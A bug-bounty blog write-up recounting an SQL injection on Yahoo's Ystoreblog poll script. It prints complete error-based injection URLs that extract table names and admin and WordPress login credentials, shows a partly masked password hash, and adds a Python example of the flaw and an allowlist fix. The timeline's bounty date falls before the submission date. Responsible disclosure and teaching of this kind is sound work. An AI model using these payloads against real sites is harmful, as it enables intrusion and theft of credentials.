Yahoo SQL Injection

Blink. Blink. Blink.

Hello Folks!

Today, I’m going to blog about a vulnerability I found in one of Yahoo’s websites, “Ystoreblog”. The vulnerability was fixed long ago, but I thought about sharing this story with you!

It’s a rainy December day. As every day, I’m in front of my computer searching for bugs, for bugs and for bugs. I visited HackerOne’s directory and came across Yahoo’s bug bounty program on HackerOne. After checking the program rules, I did some Google research about Yahoo-owned blogs and came across this website: Ystoreblog.

First Step: Finding the Vulnerability

So, as for many researchers, the first step was to check for files using Google dorks. I went to Google search and dorked: “site:ystoreblog.com ext:php”. Fortunately, I found some PHP files such as http://www.ystoreblog.com/ystore-poll/script3.php. I did some parameter brute-forcing and found out that “opt” is a valid parameter. The next thing I was excited about was checking for SQL injection. I added a quote to the parameter value and saw the SQL error message on the page: “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’=flash_poll.count1\’+1 WHERE ID=39’ at line 1”. You all know. My reaction was like this:
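As an added illustration (not the Ystoreblog code, which is not on the page), here is the pattern that error message points to: the “opt” value is spliced into a column name, which can never be bound as a query parameter, so the fix is an allowlist rather than escaping. The table and column names are a constructed stand-in modelled on the error text, and sqlite3 stands in for MySQL.

```python
import sqlite3

# Constructed stand-in for the poll table implied by the error message
# ("flash_poll.count1 ... WHERE ID=39"); the real schema is not known.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE flash_poll (ID INTEGER PRIMARY KEY, count1 INTEGER, count2 INTEGER)")
    db.execute("INSERT INTO flash_poll VALUES (39, 0, 0)")
    return db

def vote_vulnerable(db, idf, opt):
    # Untrusted 'opt' becomes part of a column name and 'idf' part of the WHERE clause.
    # A quote in 'opt' breaks the statement; returning the raw DB error to the
    # client is exactly what leaked the query shape in the write-up above.
    sql = f"UPDATE flash_poll SET count{opt}=flash_poll.count{opt}+1 WHERE ID={idf}"
    try:
        db.execute(sql)
        db.commit()
        return None
    except sqlite3.Error as exc:
        return str(exc)  # e.g. near "'=flash_poll.count'": syntax error

# Hypothetical allowlist: the only option columns the poll actually has.
ALLOWED_OPTIONS = {"1": "count1", "2": "count2"}

def vote_hardened(db, idf, opt):
    # Identifiers cannot be parameterised, so map the request value onto a fixed
    # set of known column names; anything else is rejected before touching SQL.
    column = ALLOWED_OPTIONS.get(str(opt))
    if column is None:
        return False
    # Values can be parameterised: the poll id is type-checked and bound.
    try:
        row_id = int(idf)
    except (TypeError, ValueError):
        return False
    db.execute(f"UPDATE flash_poll SET {column}={column}+1 WHERE ID=?", (row_id,))
    db.commit()
    return True

def counts(db, idf):
    return db.execute("SELECT count1, count2 FROM flash_poll WHERE ID=?", (idf,)).fetchone()
```

In production the error string from the vulnerable path would be logged server-side and replaced by a generic message; here it is returned so the leak is visible.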

[image: m1]

Next Step: Exploitation

Exploitation was not really easy. Shame on me for not having all the screenshots to show you the images.

Well, here are the queries:

First, to get the table names:
http://www.ystoreblog.com/ystore-poll/script3.php?idf=39&opt==null and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x7961686f6f73746f7265626c6f6774657374 LIMIT 1,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- --

Then, to dump the admin table content:

http://www.ystoreblog.com/ystore-poll/script3.php?idf=39&opt==null and+(select 1 FROM(select+count(*),concat((select+concat(0x3a,user,0x3a,passwd,0x3a,user_level,0x3a) FROM tbl_ystoreblog_admin+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)-- --

And finally, to dump the wp_admin table content:
http://www.ystoreblog.com/ystore-poll/script3.php?idf=39&opt==null and+(select 1 FROM(select+count(*),concat((select+concat(user_login,0x3a,user_pass,0x3a3a) FROM wp_users+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)-- --

What we got now: user_login: ystoreblog & user_pass: $P$9gqP7teXN2L6uyzg7pKVkV.******

And now you know my face after hacking the logins.

[image: happy-child]

Well, it was really tricky. I gathered all these and submitted the vulnerability to Yahoo.

Thank you for reading and see you soon!


Vulnerability timeline:

  • 2014-12-02 : Bug submitted to Yahoo
  • 2014-12-02 : More info requested
  • 2014-12-02 : More info sent
  • 2014-12-03 : Bug fixed
  • 2014-01-10 : Bounty awarded
